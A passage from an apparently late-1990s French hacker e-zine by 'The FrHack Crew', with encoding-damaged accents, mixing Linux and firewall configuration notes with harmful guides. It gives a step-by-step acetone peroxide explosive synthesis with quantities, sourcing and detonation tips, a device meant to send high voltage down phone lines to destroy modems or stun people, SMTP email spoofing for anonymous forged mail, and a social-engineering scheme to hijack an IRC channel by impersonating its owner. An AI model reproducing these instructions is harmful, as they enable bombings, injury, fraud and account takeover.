/etc/inetd.conf telnet stream tcp nowait root /usr/local/etc/netacl telnetd Avec ca quand une requˆte atteint le port ftp du systŠme netacl se d‚marre avec comme paramŠtre telnetd . Mais avant que le d‚mon soit lance le logiciel v‚rifie que la requˆte est valide selon la table . Par exemple si je veux autorise aux personnes de mon r‚seau interne de se connecter au telnet du FW faudra ajouter: netacl-telnetd: permit-hosts 193.1.1.* -exec /usr/sbin/in.telnetd (note 193.1.1.* ‚quivaut … 193.1.1.0/24) AprŠs on a aussi tous les logiciels qui implementent un relais pour les services . En fait le client fait d'abord une requˆte au service du FW puis de la fait une requˆte pour se connecter au site ext‚rieur . Selon les rŠgles du proxy cette connexion sera refus‚e ou accept‚e . -tn-gw: relais pour le service telnet . -ftp-gw: relais pour le service ftp . -rlogin-gw: relais pour le proxy rlogin . -http-gw: relais pour client HTTP et gopher .( pratique pour empˆcher certaines applications JAVA ) .... Il y en a d'autres mais je les connais pas tous donc pour plus de renseignement allez voir vous mˆme! exemple de config de /usr/local/etc/netperm-table: tn-gw: deny-hosts * -dest 193.1.1.* Interdiction a ces machines d'acc‚der au service telnet . tn-gw: permit-hosts 193.1.1.25 autorise la machine 193.1.1.25 a acc‚der au service telnet . Pas compliqu‚ et je vous jure que c'est incroyable tout ce que l'on peut faire et les espŠces de security hole que ca peut faire. The FrHack Crew Snowcrach Bas‚ sur le livre de Linux -=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Peroxyde d'acetone Le peroxyde d'ac‚tone est un explosif trŠs puissant. J'estime environ ca puissance … 10 fois sup‚rieur a celle de la poudre noir (Poudre … canon). Dans le texte qui va suivre, je vais vous expliquer comment en produire. Vous allez etre ‚tonner mais ce n'est pas vraiment compliquer, mais faut savoir comme s'y prendre. Mat‚riaux 1 bouteille de 2 litres de liqueur vide (avec bouchon) 1 Sac a poubelle noir trŠs foncer (Pour mettre la bouteille dedans) 1 bain, ou un grand lavabo (L'eau qui va avec bien entendu) 1 Filtre a caf‚ (ou 2) 1 sac blanc 1 vielle passoire Jusqu'ici les composantes sont pas trŠs difficile a trouver, c'est maintenant que cela ce complique un peu. 500 ml d'acetone pur On trouve l'acetone … la Quincaillerie du coin, dans la section dilluant a peinture. 450 ml de Peroxyde 30% On trouve le peroxyde 30% dans quelques pharmacies ,dans la section teinture pour cheveux, ou dans un centre de coiffure. Bien important faut pas que le peroxyde soit en crŠme comme a quelques endroits qui en vendent, mais bien un liquide transparant comme de eau. 20 ml d'acide muriatique 20% (HCL) On retrouve l'acide muriatique … la quincaillerie du coin, dans la section piscine, ou dans un centre de la piscine. ATTEMTION: Ce produit est tres dangereux, ne le respirer pas et essayer de pas entrer en contact avec celui-ci. Proc‚dures Tout ce qui va suivre ne doit pas etre fais dans une maison. Apres avoir v‚cu l'exp‚rience, j'Ai d‚cider de faire ca dans un garage bien a‚rer, ou meme dehors. Sinon vous risquer de brailler durant une coupe d'heure par rapport a vos yeux qui br–le et de la difficult‚ a respirer. Vous versez le 500 ml d'Acetone dans la bouteille 2 litre, au soin prener un entenoir. Ensuite vous verser le 450 ml de Peroxyde de la meme maniŠre dans la bouteille. La pour ceux qui sont pas vite vite, vous etes rendu avec une solution de 950 ml. C'est maintenant que cela vient un peu plus dangereux. Verser directement dans la bouteille les 20 ml Acide muriatique, mais pas avec le meme entenoir que pr‚c‚dament, ou laver le bien et essuyer le bien. Sinon une petite r‚action chimique va se produire. Ensuite agiter un peu. ATTENTION: Attender avant de mettre le bouchon. Quand vous allez verser l'Acide muriatique, une petite r‚action chimique va se produire. C'est normal que cela fasse de petite bulle au dessus de la solution avec des vapeurs et que le fond de la bouteille soit un peu chaud. Cela devrais durer au maximum 25 min. Apres 25 min tout devrais etre rentrer dans l'ordre. ATTENTION: Si le fond de la bouteille est encore chaud apres 25 minutes ou qui a encore des vapeurs, jeter votre solution. Vous avez rater l'exp‚- rience. Moi je dois vous avour que sur environ 20 fois, cela met arriver seulement une fois. Je ne peux expliquer la cause. Ensuite viser le bouchon. Maintenant vous avez le principal de fait. Ensuite faite couler de l'eau dans votre bain (Lavabo) (Juste de l'eau froide, environ … 4 celcius) Pour que la bouteille soit recouverte completement. D‚poser la bouteille dans le sac noir,et ensuite d‚poser le sac noir (Contenant la bouteille) dans l'eau. Assurer vous que la bouteille est recouverte du sac noir partout, et que le sac est completement dans l'eau. La il faut patienter 2 jours, en laissant le tout comme ca. Apres deux jours, ou plus, Vous sorter la bouteille, et vous aller voir une petite poudre blanche dans le fond. Cette poudre est le peroxyde d'Ac‚tone. Main- tenant vous devez la filtrer. Prener un filtre a caf‚ et une vielle passoir. D‚poser le filtre dans la passoir, au besoin vous pouvez mettre 2 filtres. Vider votre solution dans ce filtre au dessus d'un ‚vier ou au dessus d'un plat. Jeter la solution qui reste. La maintenant il ne vous reste plus qu'a faire secher la poudre. Prener un sac en plastique blanc, si le sac est de couleur votre poudre va prendre la couleur. Bien important que ca soit du plastique. Ensuite laisser s‚cher durant 2 jours a l'air. Pas dehors sinon vous risquer de perdre votre pou- dre avec le vent. Ni dans votre maison a cause des vapeurs. Faire secher dans un garage ou autres. Attention faut pas qui n'est aucune chaleur. PAs au gros soleil, ni pres d'une lumiere. Apres 1 journer la poudre peut vous sembler seche, mais erreur, elle reste humide pareille un peu. Et si vous la stocker, vous risquer de la retrouver tres tres humide apres quelques jours. LAisser s‚cher au moins 2 jours minimum. Et voila vous avez du peroxyde d'Ac‚tone. Faite pas sauter tout votre poudre d'un coup, essayer une petite dose avant. 1 gramme, et vous aller etre tres surpris. Si la poudre est comprimer une d‚tonation se produit, sinon vous aler avoir un champignon de feu. Cette poudre est tres explosive, si elle est bien faire, une grosse pierre lancer sur celle ci devrais d‚clancher une explosion. La je vous averti, cette poudre est tres tres puissante, c'est pouquoi faite attention. Je vous conseille pas d'Allumer celle si avec une meche, mais plutot avec un d‚tonateur. The FrHack Crew _Franck -=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Trojan Bon... pour le zine de frhack j'ai d‚cid‚ de vous parler un peu des trojans. Oui... ces petits programmes lames qui servent seulement a causer de la merde. Je vais vous expliquer comment c'est fait, comment ca agit, d‚pendemment des types, puis comment s'en d‚barasser ‚videmment. Je ne vous expliquerai pas comment s'en servir, parce que c'est tellement simple, et surtout tellement STUPIDE que mon frŠre de 8 ans pourrait devenir un SUPER DUPER HACKER avec cette merde la. Socket de troie (par JCzic) Le premier trojan a ˆtre connu, c'est en meme temps un des plus dangeureux. C'est seulement un petit Serv-U (un serveur FTP) cach‚ dans un fichier.. puis qui est lanc‚ au d‚marrage de votre ordinateur. Ca donne le contr“le total de votre ordinateur. Une petite interface graphique trŠs simple pour le client, et le tour est jou‚, n'importe quel enfant peur d‚truire votre HD. Le problŠme est facile a d‚tecter, il y a une petite fenetre qui s'ouvre et qui dit... "un fichier .DLL requis, Setup32.dll, n'a pas ‚t‚ trouv‚" , ISAPI32.DLL pour la deuxiŠme version... puis il y a la troisiŠme. La troisiŠme version est vraiment une catastrophe.. un virus de la pire espŠce. Celui la, tu le caches dans n'importe quel fichier, pis ca agit comme un vrai virus... souvent tu dois r‚installer winblows meme... tk .. lame. Back Orifice (par le Cult of the Dead Cow) Un peu diff‚rent comme concept... c'est plutot un programme qui pourrait servir a un admin de r‚seau. Il est encore plus dangeureux que le socket de troie... pourquoi? parce qu'il permet l'accŠs a des ressources que meme vous n'avez pas acces... les dll par exemple. Quand vous ˆtes infect‚s... c'est parce que vous aurez ouvert un ptit fichier sans icone (ca c'est stupide d‚ja en partant) et qu'il y a une petite fenetre M$DOS qui va ˆtre apparue. L'interface du controle est un petit peu moin simple... alors disons qu'un enfant de ... 10 ans pourrait s'en servir... c'est bon quand meme une ‚volution de 2 ans. NetBus et les autres Ceux la sont un petit peu moin connus... si tu regardes NetBus.. il est pas trŠs dangeureux. C'est plus pour s'amuser... prendre des screenshots... entk c‚ poche quand mˆme. Je vous dirais que de toutes facons, n'importe quel trojan est vraiment la chose la plus conne, meme si c'est consid‚r‚ comme du hack. Pour ceux qui savent moindrement ce que c'est que le hack, vous vous rendrez compte que trojan != hack .. de toutes facons.. si vous ˆtes un enfant de 10 ans vous allez pouvoir devenir un mega hacker!!!! aprŠs cet article si jamais ya encore quelqu'un qui pause des question sur les trojans jva lui en servir un sur un plat pour qu'il goute a sa propre m‚decine. The FrHack Crew Bismuth -=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Port Linux -=-=-=-=-=-=-=Allow / Deny =-=-=-=-=-=-=-=- Pratique si vous avez un shell ou une box et que vous ne voulez pas vous faire hacker par telnet (23). C`est tellement simple, 1.Vous allez dans /etc (C`est la qu`il y a la plupars des configurations) 2.Tappez pico inetd.conf et vous verrez quelque chose comme ceci, _______________________________________________________________________________________________| # # inetd.conf This file describes the services that will be available # through the INETD TCP/IP super server. To re-configure # the running INETD process, edit this file, then send the # INETD process a SIGHUP signal. # # Version: @(#)/etc/inetd.conf 3.10 05/27/93 # # Authors: Original taken from BSD UNIX 4.3/TAHOE. # Fred N. van Kempen, # # Modified for Debian Linux by Ian A. Murdock # # Modified for RHS Linux by Marc Ewing # # # # Echo, discard, daytime, and chargen are used primarily for testing. # # To re-read this file after changes, just do a 'killall -HUP inetd' # #echo stream tcp nowait root internal #echo dgram udp wait root internal #discard stream tcp nowait root internal #discard dgram udp wait root internal #daytime stream tcp nowait root internal #daytime dgram udp wait root internal #chargen stream tcp nowait root internal #chargen dgram udp wait root internal # # These are standard services. # #ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd gopher stream tcp nowait root /usr/sbin/tcpd gn # do not uncomment smtp unless you *really* know what you are doing. # smtp is handled by the sendmail daemon now, not smtpd. It does NOT # run from here, it is started at boot time from /etc/rc.d/rc#.d. #smtp stream tcp nowait root /usr/bin/smtpd smtpd #nntp stream tcp nowait root /usr/sbin/tcpd in.nntpd # # Shell, login, exec and talk are BSD protocols. # shell stream tcp nowait root /usr/sbin/tcpd in.rshd login stream tcp nowait root /usr/sbin/tcpd in.rlogind #exec stream tcp nowait root /usr/sbin/tcpd in.rexecd talk dgram udp wait root /usr/sbin/tcpd in.talkd ntalk dgram udp wait root /usr/sbin/tcpd in.ntalkd #dtalk stream tcp waut nobody /usr/sbin/tcpd in.dtalkd # # Pop and imap mail services et al # pop-2 stream tcp nowait root /usr/sbin/tcpd ipop2d pop-3 stream tcp nowait root /usr/sbin/tcpd ipop3d imap stream tcp nowait root /usr/sbin/tcpd imapd # # The Internet UUCP service. # #uucp stream tcp nowait uucp /usr/sbin/tcpd /usr/lib/uucp/uucico -l # # Tftp service is provided primarily for booting. Most sites # run this only on machines acting as "boot servers." Do not uncomment # this unless you *need* it. # #tftp dgram udp wait root /usr/sbin/tcpd in.tftpd #bootps dgram udp wait root /usr/sbin/tcpd bootpd # # Finger, systat and netstat give out user information which may be # valuable to potential "system crackers." Many sites choose to disable # some or all of these services to improve security. # # cfinger is for GNU finger, which is currently not in use in RHS Linux # finger stream tcp nowait root /usr/sbin/tcpd in.fingerd #cfinger stream tcp nowait root /usr/sbin/tcpd in.cfingerd #systat stream tcp nowait guest /usr/sbin/tcpd /bin/ps -auwwx #netstat stream tcp nowait guest /usr/sbin/tcpd /bin/netstat -f inet # # Time service is used for clock syncronization. # time stream tcp nowait nobody /usr/sbin/tcpd in.timed time dgram udp wait nobody /usr/sbin/tcpd in.timed # # Authentication # auth stream tcp nowait nobody /usr/sbin/in.identd in.identd -l -e -o # # End of inetd.conf linuxconf stream tcp wait root /bin/linuxconf linuxconf --http ------------------------------------------------------------------------------------------------| -===Tout les ports avec un # sont ferm‚ exemple:#ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a (le port ftp/shell est ferm‚) ----------->Pour l`ouvrir ta rienque a enlever le # . NE JAMAIS FERMER LE PORT "auth" Apres tu fais save... (Si tu veux faire des shells account tu dois l`aiss‚ ton port telnet et ftp ouvert.) Apres tu fais pico hosts.allow Tu devrais voir quelque chose comme ceci: ________________________________________________________________________________________________| # # hosts.allow This file describes the names of the hosts which are # allowed to use the local INET services, as decided # by the '/usr/sbin/tcpd' server. # in.telnetd: .loginnovation.com, 206.167.170., .videotron.net, .ivic.qc.ca, 206.231.210., .concepta.com in.telnetd: .videotron.net, 207.96.178., .refract.ctron.net, .total.net, .enter-net.com, 206.167.49. in.ftpd: .loginnovation.com, 206.167.170., .videotron.net, .ivic.qc.ca, 206.231.210., .concepta.com in.ftpd: .videotron.net, 207.96.178., .refract.ctron.net, total.net, .enter-net.com, 206.167.49. in.telnetd: .quebectel.com, 142.169.181. in.ftpd: .quebectel.com, 142.169.181. _________________________________________________________________________________________________| Tu met les adresses de ceux qui ont des shells seulement,exemple:Tu fais un shell a quelqun sur videotron alors tu mettra .videotron.net, dans la liste.. si il est seul a avoir le shell laisse le seul dans la liste.Ceci empechera quelqun dun autre providers de lui voler son pass etc... Il pourra rentrer si il utilise un telnet spoof.... The FrHack Crew Khanabyss -=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Server SMTP Je vais vous parler de l'envoie d'un mail par les serveurs SMTP. Rien qu'avoir ca vous devez vous dire ca sert … rien.... car y'a les programmes pour ca. Mais vous vous trompez c'est super pratique car vous pouvez envoyez un mail de fred … jerome sans que fred sache que vous envoyez ce mail a jerome et donc vous envoyez votre mail d'un maniere totalment anomyne... Et en ^plus vous aurez la joie d'avoir realiser ca vous meme et pas simplement aoie tapez l'emeteeur le recepteur le texte et d'avoir cliker sur send tout ca sur un logi fait par un ducon de progamateur anglophones..... Il peut y avoir quand meme un risque de se faire tracer donc si vous avez un IP fixe GARE A VOUS en revanche si vous avez un IP non fixe alors c'est deja moins risquez mais mefiez vous quand meme car on c'est jamais et surtout pour le serveur SMTP que vous choisirez NE PRENEZ PAS CELUI DE VOTRE PROVIDER car si vous etes tracer vous serez tres vite gaulez.... Bon on se met au travail : -------------------------- *materiel : un ordinateur avec telnet (donc Win 95 / 98 et voire meme win 3.11 mais bon...) un serveur SMTP valide (bon je vais poas vous insultez en vous expliquant comment en trouver un car si t'es pas un newbies ? Non ? et si oui tanpis ;) des doigts ou des orteils a default mais c'est plus dur pour tapez car sur ces serveurs les BACKSPACE ne sont pas pris en compte donc faut pas faire de faultes...... un cerveau et de la bonne volonte... *ALLEZ au travail: vous avez donc vot serveur valide et vous y acceder par telnet Choisisez un serveur qui au lancement affiche 220 plutot qu'un seveur qui vous affiche un putain de merde de grand barratin qui sert a rien.... Voici un tit exemple : 220 bill.gates.net SendMail X-320 Io v40.5 Ready at Wed, 18 Nov 1998 02:20:53 E * HELO bill.gates.net 250 bill.gates.net Hello mon.domaine.com (mon.domaine.com), pleased to meet you * MAIL FROM: 250 ...Sender Ok! * RCPT TO: 250 ...Recipient Ok! * DATA 354 Please enter your message body, ending with a "." on a line by itself * Alut ! toa ca feel moa ca feel * bon je vais te leaisser c'est pu koi te dire * au fait je te retourne * . 250 Mail Ok! * QUIT Bon au cas ou t'as poas compris mais si t'as poas cmpris on va tout mettre au clair les * sont au commencement des lignes tapez par l'utilisateur et donc FAUT POAS LES TAPER... Et bon j'ai vraiment rien de mieux a foutre je vous resume les commandes ... Putain je m'etonne tellemtn que je suis bon... ou meme con ... Eh si tu pense que suis con vient me le dire en face ;) Bon alors v'la tes commandes : HELO bill.gates.net : c'est un truc essentiel c'est le nom du domaine donc ... MAIL FROM:<(behn la je crois que tu comprend ce qui faut marque)> RCPT TO:<(behn la aussi c'est la poire que tu maile...)> DATA : c'est pour commence a entrer le texte de ton mail... . : c'est pour finir ton mail HELP : c'est si t'as besoin d'aide QUIT : je comprend poas a qoui ca sert... The FrHack Crew Langly -=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Slogan /msg #hack.fr Bon tlm, dite dequoi d'intelligente qui va paraitre dans le Emag. You must follow the Goodway uh.. /msg #hack.fr Tu peux faire mieux oktober.. :) "Follow The Leader" Mieux vaut ˆtre dur de la feuille que mou de la branche! Des erreurs de jeunesse, c'est si vite arriv‚. <_Franck> Souhaitons que lui meurt pas en sortant!! Bah, ‡a risque pas d'arriver! FOLLOW THE LEADER! Le gourvernement as ‚t‚ invent‚ pour nous crosser Les compagnies tels FT ont ‚t‚ invent‚ pour nous crosser Le hacking as ‚t‚ invent‚ pour nous lib‚rer Amen :) ces le 2e zine en 1 ans!!! donc l'autres est pour l'ans prochain <[ewoks]> j ai une t‚horie paradoxale que j ai inventer qui me plait bien "tous est relatif sauf la bouffe" mais ses stupide pi s am arrive de dire sa quandje suis sur mon trippe bouffe s afeque <[ewoks]> je ne crois pas en se que vous dite mais je serais pret a me battre pour que vous puissez le dire -=Voltaire=- Mourrir n'est pas bon pour la sant‚ - Sant‚ Canada -=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- WeaponX boxe C'est box marche a base d'‚nergie static ,et cette ‚nergie peut cr‚er beaucoup de volts et peu d'amp‚rage (Juste assez pour faire fondre un modem ou assomer lit‚ralement quelqu'un). Pour la construire vous aurez besoin de faire: -D‚connecter tous les t‚l‚phones de votre ligne , ou tout autre objets qui utilise la ligne t‚l‚phonique(r‚pondeur,boite vocale,modem,etc). -D‚pluger toutes t‚l‚visions,radio ou autre pour ‚viter le danger. -Vous aurez besoin d'un g‚n‚rateurs d'‚nergie static. -Connecter une balle de cuivre au fils rouge et une barre de m‚tal au fils vert. -Mettez quelque chose pour vous prot‚ger les mains(mat‚riaux non conducteurs) come des gants de vaiselles en ROBER -Meter votre g‚n‚rateur … au moins 10 000 volts -Metter votre boulle de cuivre coller sur le G‚n‚rateur d'‚lectricit‚ static.Tener la barre de Fer dans votre autre main et garder la loin de votre G‚n‚rateur(au moins deux pieds de l'autre sens). -Composer le num‚ro -Metter la bar de fer au dessus du G‚n‚rateur il vas y avoir des petites ‚clairs n'ayez pas peur. -AprŠs quelque secondes une grosse ‚clair va aparaitre du G‚n‚rateur a la bar de fer.Tener bien la bar et ne la bouger pas. -Le t‚l‚phone va faire un bruit bizarre et ensuite peut-ˆtre que votre prise de courant va fondre,mais Le r‚sultat va ˆtre trŠs bons. Voici un plan de ce que ca devrait ressembler ------------------ | 1 2 3 | | | | 4 5 6 | | | | 7 8 9 | | | | # 0 * | ------------------ | | Boule de cuivre | | _ | | Bar de Fer (_)-----| |--------------------- | | Fils rouge------->| | | |>-----fils vert G‚n‚rateur | | -------- | | | | | | | | | | | | | | -------- | | D'‚nergie static | | ----------------------------------------------- Plogue dans le mur The FrHack Crew Snowcrach -=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Password Linux Un des fichiers les plus important sur un systŠme linux (et un des plus int‚ressant pour la plupart d'entre nous :) ) est le fichier passwd. J'ai donc d‚cid‚ de vous offrir une petite introduction … ce fichier. D'abord, la structure : Chaque ligne repr‚sente un utilisateur, un deamon ou un service du systŠme... Chaque ligne est s‚par‚e en parties par des " : " qui repr‚sentent chacun un segment d'information sur les accŠs et droits de l'utilisateur. Ex : root:x:0:0::/root:/bin/bash - La premiŠre partie de la ligne repr‚sente le nom de l'utilsateur. - La deuxiŠme repr‚sente le mot de passe de l'utilisateur (il est encod‚). Si un X ou un * se trouve … cette place, c'est parce que les mots de passe se retrouve dans un autre fichier appel‚ fichier shadow, cette mesure sert de double s‚curit‚ car si quelqu'un r‚ussi … se procurer le passwd file, il devra aussi avoir le shadow pour pouvoir d‚crypter les passwords. - Le troisiŠme champ est l'UID, le User ID qui sert a identifier l'utilisateur par un num‚ro pour le systŠme d'exploitation. - La quatriŠme position est le GID, le Group ID qui identifie le # du groupe auquel appartient cet utilisateur. - En cinquiŠme position vient le champ de commentaire qui peut servir … mettre le vrai nom d'un utilisateur ou d'autres infos. - La position suivante est le r‚pertoire home de l'utilisateur, le r‚pertoire ou il se retrouve lorsqu'il se log sur le system. - En dernier, nous retrouvons la premiŠre commande ex‚cut‚e lorsque l'utilisateur se log, il s'agit habituellement d'un interpr‚teur de commande qui permettra … ce mˆme utilisateur d'entrer certaines commande pour interagir avec l'OS. Exemple de fichier passwd complet : (ce fichier se trouve dans /etc/passwd) operator:x:11:0:operator:/root:/bin/bash root:x:0:0::/root:/bin/bash shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown sync:x:5:0:sync:/sbin:/bin/sync bin:x:1:1:bin:/bin: ftp:x:404:1::/home/ftp:/bin/bash daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: mail:x:8:12:mail:/var/spool/mail: postmaster:x:14:12:postmaster:/var/spool/mail:/bin/bash news:x:9:13:news:/usr/lib/news: uucp:x:10:14:uucp:/var/spool/uucppublic: man:x:13:15:man:/usr/man: guest:x:405:100:guest:/dev/null:/dev/null nobody:x:65534:100:nobody:/dev/null: daft:x:1000:100:,,,:/home/daft:/bin/bash Son utilit‚ : Le fichier permet entre autres de r‚cup‚rer le mot de passe d'un systŠme si ce dernier ne les a pas mis en shadow. Il permet aussi d'enlever un utilisateur du systŠme en effacant la ligne qui lui correspond dans le fichier. NOTE : Ne tentez jamais de modifier le champ du mot de pass en le changeant directement dans le fichier passwd (h‚h‚h‚h, bin vous pouvez essayer, mais je garantis pas la validit‚ du passwd que vous allez avoir entr‚!) S‚curit‚s possibles : Il y a diff‚rent systŠmes qui enlŠvent le champ du passwd pour le remplacer en x ou * pour des raisons de s‚curit‚. Il y a d'abord le systŠme des shadowed passwd files qui enlŠvera tous les passwd du fichier passwd pour les mettre dans le fichier " shadow ". Ensuite, il y a le NIS (network information system) qui lui utilise une banque centralis‚e d'information sur les utilisateurs et leurs mots de passe (trŠs rare). Finalement, il y a les Yellow Pages qui n'utilisent pas le champ r‚serv‚ au mot de passe dans passwd et qui fonctionne … la maniŠre de NIS. Il y a naturellement d'autres systŠmes mais ceux-ci sont les plus courants. The FrHack Crew Oktober -=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Coment resetter le password du op 500 sur undernet Il y a plusieur m‚tode. Ca devrait marcher facilement sur les petit channel car vous devez avoir un access 450 et + . Methode Facile Vous ˆtes sur un nouveau channel et il y a un X ou W . Essayer de faire du SE pour avoir un access 499. Lorsque vous avez votres access, faites en un autres avec un nick quasiment pareille au 500 . Exemple: Admetons que le 500 c'est FILA667, tu fais un access a FILA667, et le reste doit se faire par e-mail . Vous devez prendre le e-mail du 500 . Trouver un mailleur annonyme ou utiliser la thecnique du server SMTP comme expliqu‚ ci-dessus et c'est partit. Comme adresse de l'expediteur ecrivez celle du 500 (adresse a envoyer ces w@undernet.org ou x@undernet.org dependament si c'est X ou W dans le channel). Bon voici le formulaire, copier coller le dans le e-mail et inscriver-y ceci: ----------------------------------- S'il vous plait, inscrivez un "X" a l'endroit approprie: 1) __ Correction de Mask 2) __ Ajouter un(des) nouveau(x) user@host(s) 3) __ Nouveau fournisseur internet; mon user@host dois etre change 4) __ Autre Description: S'il vous plait, fournir les informations suivantes: Canal: Bot (X/W): Votre Nickname: User@host actuel: Nouveau user@host: Voulez-vous le(s) nouveau(x) Mask(s) ajoute(s) a X/W comme vous l'avez demandez? (Oui/Non): Si oui, a quel(s) niveau(x) d'acces, et sous quel(s) Nickname(s)? Ancienne adresse e-mail: Nouvelle adresse e-mail: (Si necessaire) _______________________________ Bon voici ce que vous ecrivez: Dison que je veux le faire au canal #quebec et que le 500 est DragGuard et que mon host est *!*@*.cite.net et mon e-mail est bill@microsoft.com , voici ce que j'ecrit: · la premiŠre question je coche : 2 (ajout d'un news user host) apres dans canal j'ecrit: #quebec apres dans bot: x dans votres nick ces: Draguard (avec juste un g pour le faker) dans user host actuel: undernet@step.polymtl.ca apres ca dans nouvelle host: undernet@*.cite.net Voulez-vous le(s) nouveau(x) Mask(s) ajoute(s) a X/W comme vous l'avez demandez? (Oui/Non): tu ecris: OUI Si oui, a quel(s) niveau(x) d'acces, et sous quel(s) Nickname(s)? access 500 nick: draguard Ancienne adresse e-mail: %?$%%@?%$?%?.com (tu ecrit l'adresse du 500) Nouvelle adresse e-mail: bill@webmaster.com (tu ecris ton vrai e-mail) (Si necessaire) Une fois terminer, vous incluer: P.S mon access sur mon ancien provideur fini aujourd'hui, veuiller envoyer le courier … bill@microsoft.com Envoyer le message. AprŠs quelques temps vous aurez un retour de mail vous indiquand si la demande as ‚t‚ accepter. Si oui , le e-mail inclura un password temporaire. Servez-vous en bien. The FrHack Crew NuClEaR -=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Configuration de la souris sous X La souris Xfree86 utilise beaucoup la souris. Vous devez donc indiquer le type de la v“tre et comment elle est connect‚e au systŠme. XFree86 reconnaŒt la majorit‚ des souris usuelles et un type qui ne serait pas support‚ directement peut souvent simuler une souris plus courante. Dans le fichier de configuration, la section concernant … la souris se nomme Pointer (pour un p‚riph‚rique de d‚signation ou de pointage), et ressemble … ceci : Section " Pointer " Protocol " Microsoft " Device " /dev/mouse " # Si vous utilisez XQUEUE, commentez les deux lignes pr‚c‚dentes et uncommentez la suivante # Protocol " Xqueue " # Baud rate et Samplerate ne concerne que quelques souris Logitech # BaudRate 9600 # SampleRate 150 # Emulate3Buttons est une option pour les souris Microsoft … deux boutons # Emulate3Buttons # ChordMiddle est une option pour certains souris Logitech … trois boutons # ChordMiddle EndSection La clause Protocol d‚signe la souris ou l'‚mulation … utiliser. La page de manuel de Xconfig ou XF86Config indique la liste des types de souris reconnus. Si vous avez une souris d' un autre fournisseur que Microsoft ou Logitech, lisez cette page de manuel, ou toute autre documentation … votre disposition, afin de d‚terminer le protocole … utiliser. Une autre m‚thode pour d‚terminer le type de la souris consiste … observer les messages affich‚s au d‚marrage de linux - il identifie souvent la souris. Les souris Microsoft utilisent toujours le protocol Microsoft. Beaucoup de souris Logitech sont compatibles avec Microsoft, mais les plus r‚centes utilisent le protocol Mouseman. Les souris Dexxa (et celles de nombreux autres fabriquants) ‚mulant une souris Microsoft, vous pouvez utiliser ce protocol avec celles ci... La clause Device d‚finit le port auquel la souris est attach‚e, … l'aide de la terminologie Linux. Dans la majorit‚ des cas, il suffit d'indiquer /dev/mouse, la proc‚dure d'installation de Linux ayant d‚j… configur‚ la souris. Si vous utilisez une souris sur le port PS/2 d'un IBM PS/2, utilisez le pilote de p‚riph‚rique PS/2 et non pas un pilote de port s‚rie. Les pages de manuel et la documentation de Xfree86 indiquent les pilotes de p‚riph‚riques valides, mais la plupart des versions reconnaissent le suivants : /dev/mouse Pilote de souris par d‚faut /dev/inportbm Souris Microsoft uniquement (bus microsoft) /dev/logibm Souris Logitech uniquement (bus logitech) /dev/psaux Souris sur le port PS/2 Une souris sur le bus (par opposition … une souris s‚rie) utilise une IRQ particuliŠre, tant dans le noyau que dans Xfree86. Assurez-vous que la valeur utilis‚e est la mˆme partout! De mˆme que pour le clavier, une clause existe pour les utilisateurs de Xqueue. La majorit‚ des installations de Xfree86 n'utilisant pas Xqueue, laissez cette ligne en commentaire. Le d‚bit et l'‚chantillonnage (clauses Bitrate et SampleRate), comme le commentaire l'indique concernent des anciennes souris Logitech. La plupart des souris n'en ont pas de besoin, laissez donc ces lignes comment‚es. Si votre souris ne fonctionne pas sans ces clauses, essayez d'abord un d‚bit de 9600 bauds puis, si cela ne va toujours pas, de 1200. Certaines anciennes versions de Xfree86 utilisaient toujours la clause BaudRate, mais commencez d'abord par la laisser en commentaire. L'option Emulate3Buttons est utile si votre souris n'a que deux boutons. Dans ce cas, elle permet de simuler la pr‚sence d'un troisiŠme bouton par l'enfoncement simultan‚ des deux boutons. Beaucoup d'applications linux utilisent les trois boutons de la souris, cette option est donc utile pour les souris Microsoft et compatibles. Finalement, l'option ChordMiddle s'applique … quelques souris Logitech. Si vous utilisez le pilote Logitech, commencez par tester votre souris sous Xfree86 sans cette option. Si elle ne se comporte pas correctement, retirez le commentaire de la ligne. La majorit‚ des souris Logitech n'a pas besoin de cette option, mais certains modŠles ne reconnaitront pas correctement le bouton du milieu sans elle. The FrHack Crew Oktober -=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Conclusion Bon... je n'ai jamais eu de talent pour les conclusions, alors je vais ˆtre direct. Nous esp‚rons que vous avez apr‚ci‚ le deuxieme Emag de FrHack et nous comptons en sortir un autre le premier f‚vrier 1999. Je tiens … remercier tout les colaborateurs de ce Emag, aussi tout le monde qui vienne sur #hack.fr quotidiennement , les hackers, les codeurs, les phreakers, les anarchistes, et tout ce beau monde qui continue sans cesse de faire chier le gouvernement (Simple vengeance). Je tiens aussi … remercier specialement : -Brain Override pour mavoir aider … repartir FrHack. -PsYkAoS pour m'avoir aider … administrer ce channel. -Oktober mon guru de linux pr‚f‚r‚. -NuClEaR pour m'avoir aider … registr‚ ce channel. -Le Pepsi pour m'avoir aid‚ … rester ‚veiller toutes ces nuits blanches que j'ai pass‚ … coder. Et tous les autres que j'ai pas inclu et qui m'ont aid‚ pour FrHack. Si vous avez des questions ou des recommandations : Snowcrash23@hotmail.com Snowcrach et l'‚quipe de FrHack